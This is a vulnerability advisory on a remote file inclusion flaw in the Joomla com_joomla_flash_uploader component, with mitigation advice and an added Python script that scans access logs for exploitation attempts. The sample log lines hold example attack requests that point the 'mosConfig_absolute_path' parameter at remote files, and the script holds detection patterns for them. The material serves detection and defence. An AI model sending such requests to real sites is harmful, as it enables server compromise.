vendor: com_joomla_flash_uploader
by: milw0rm
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: com_joomla_flash_uploader
Affected Version From: 2.5.2001
Affected Version To: 2.5.2002
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Joomla com_joomla_flash_uploader Remote File Include
Versions 2.5.1 and 2.5.2 of the Joomla com_joomla_flash_uploader component are vulnerable to remote file inclusion. An attacker can exploit this vulnerability by manipulating the 'mosConfig_absolute_path' parameter of the 'install.joomla_flash_uploader.php' and 'uninstall.joomla_flash_uploader.php' scripts so that they include a malicious file from a remote server.
Mitigation:
Update to the latest version of the Joomla com_joomla_flash_uploader component. Disable any unnecessary or unused components and extensions.
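For detection, the following added example (not part of the original advisory or of the component) scans web server access logs for requests to the two scripts named above and grades them by how 'mosConfig_absolute_path' is supplied. The log format, the `/site/` path prefix, the addresses and the host names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script names and parameter name are taken from the advisory text.
SCRIPTS = ("install.joomla_flash_uploader.php",
           "uninstall.joomla_flash_uploader.php")
PARAM = "mosconfig_absolute_path"

# Request line inside an Apache/nginx style access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that names a remote resource: "scheme://..." or "//host/...".
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

def classify(line):
    """Return None for unrelated traffic, otherwise a verdict string."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not unquote(target.path).lower().endswith(SCRIPTS):
        return None
    # parse_qs percent-decodes values once, as the server would.
    for name, values in parse_qs(target.query, keep_blank_values=True).items():
        if name.lower() != PARAM:
            continue
        if any(REMOTE.match(v) for v in values):
            return "remote-include"       # path variable points off-host
        return "parameter-supplied"       # path variable set by the client
    return "direct-script-access"         # installer script requested directly

def scan(lines):
    """Return (line_number, verdict) for every log line worth reviewing."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v]

# Constructed sample log lines (documentation address ranges and example.org).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /site/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://files.example.org/a.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /site/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=ftp%3A%2F%2Ffiles.example.org%2Fa.txt HTTP/1.1" 200 298',
    '203.0.113.5 - - [01/Jan/2024:10:01:00 +0000] "GET /site/install.joomla_flash_uploader.php?mosConfig_absolute_path=/var/www HTTP/1.1" 200 10',
    '203.0.113.5 - - [01/Jan/2024:10:01:02 +0000] "GET /site/install.joomla_flash_uploader.php HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}")
```

Parameters sent in a POST body do not appear in standard access logs, so a "direct-script-access" verdict on a POST request still merits review.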